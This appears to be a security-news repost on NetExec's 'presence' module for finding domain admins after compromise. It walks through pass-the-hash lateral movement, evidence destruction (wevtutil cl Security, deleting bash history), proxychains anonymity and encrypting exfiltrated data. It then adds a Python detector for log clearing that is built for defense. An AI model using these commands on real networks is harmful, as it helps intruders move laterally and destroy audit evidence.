
NetExec’s latest “presence” module helps identify Domain/Enterprise Admins post-compromise by scanning:
– `C:\Users\` directory
– Running processes
– Scheduled tasks
Using native Windows protocols, it evades detection better than custom tools.
You Should Know:
1. Install/Update NetExec
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install .
2. Run the “Presence” Module
nxc smb <TARGET_IP> -u <USER> -p <PASSWORD> -M presence
3. Manual Checks (If NetExec Isn’t Available)
- Check Users Folder:
Get-ChildItem C:\Users | Select-Object Name
- List Running Processes:
Get-Process -IncludeUserName | Where-Object { $_.UserName -like "DOMAINADMIN" }
- Scheduled Tasks:
Get-ScheduledTask | Where-Object { $_.Principal.UserId -like "DOMAINADMIN" }
4. Lateral Movement with NetExec
nxc smb <TARGET_IP> -u <DOMAIN_ADMIN_USER> -H <NTLM_HASH> --local-auth -x "whoami"
5. Covering Tracks (Linux/Win)
- Clear Logs (Windows):
wevtutil cl Security
- Delete Command History (Linux):
history -c && rm ~/.bash_history
What Undercode Say
NetExec’s “presence” module simplifies post-exploitation reconnaissance, but manual checks ensure redundancy. Always:
– Use proxychains for anonymity:
proxychains nxc smb <TARGET> -u <USER> -p <PASS>
– Encrypt exfiltrated data:
tar czf - /data | openssl enc -aes-256-cbc -out data.tar.gz.enc
– Check for SIEM alerts post-operation:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688}
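From the defender's side, the log clearing in step 5 leaves evidence in the same event stream the 4688 query above reads: a Security log clear writes event 1102, and process creation events record the `wevtutil` command line when command-line auditing is enabled. The following is an added example, not code from the original post or from NetExec; the flattened dictionary layout and the sample events are constructed assumptions modelled on Windows event field names.

```python
import re

# wevtutil (bare, full path, quoted, any case) followed by its cl / clear-log verb.
WEVTUTIL_CLEAR = re.compile(
    r'(?:^|[\\/\s"])wevtutil(?:\.exe)?"?\s+(?:cl|clear-log)\s+"?([^\s"]+)',
    re.IGNORECASE,
)

def detect_log_clearing(events):
    """Return (host, user, rule, detail) tuples for log-clearing activity."""
    findings = []
    for ev in events:
        host, user = ev["Computer"], ev.get("SubjectUserName", "?")
        if ev["EventID"] == 1102:
            # Written to the Security log itself whenever that log is cleared.
            findings.append((host, user, "security-log-cleared", "Security"))
        elif ev["EventID"] == 4688:
            cmd = ev.get("CommandLine") or ""
            image = ev.get("NewProcessName", "").lower()
            m = WEVTUTIL_CLEAR.search(cmd)
            if m:
                findings.append((host, user, "wevtutil-clear", m.group(1)))
            elif not cmd and image.endswith("\\wevtutil.exe"):
                # Command-line auditing is off: only the image name is known.
                findings.append((host, user, "wevtutil-no-cmdline", "unknown"))
    return findings

# Constructed sample events (not taken from a real host).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil cl Security"},
    {"EventID": 1102, "Computer": "WS01", "SubjectUserName": "alice"},
    {"EventID": 4688, "Computer": "WS02", "SubjectUserName": "bob",
     "NewProcessName": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": r'"C:\Windows\System32\WEVTUTIL.EXE" clear-log Application'},
    {"EventID": 4688, "Computer": "WS03", "SubjectUserName": "carol",
     "NewProcessName": r"C:\Windows\System32\wevtutil.exe",
     "CommandLine": "wevtutil el"},  # enumerating logs is not clearing
    {"EventID": 4688, "Computer": "WS04", "SubjectUserName": "dave",
     "NewProcessName": r"C:\Windows\System32\wevtutil.exe", "CommandLine": ""},
]

if __name__ == "__main__":
    for finding in detect_log_clearing(SAMPLE_EVENTS):
        print(finding)
```

Forwarding events off the host as they are written keeps the 4688 and 1102 records available even after the local Security log has been cleared.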
Prediction
Increased adoption of native protocol abuse (like SMB/WMI) will challenge traditional EDR solutions, pushing defenders toward behavioral analytics.
Expected Output:
[+] Domain Admins found in C:\Users:
- DA_Admin1
- DA_Admin2
[+] Processes running as Domain Admins:
- explorer.exe (DA_Admin1)
[+] Scheduled Tasks:
- BackupTask (User: DOMAIN\EnterpriseAdmin)
Relevant URL: NetExec GitHub
Reported By: Alexander Neff – Hackers Feeds


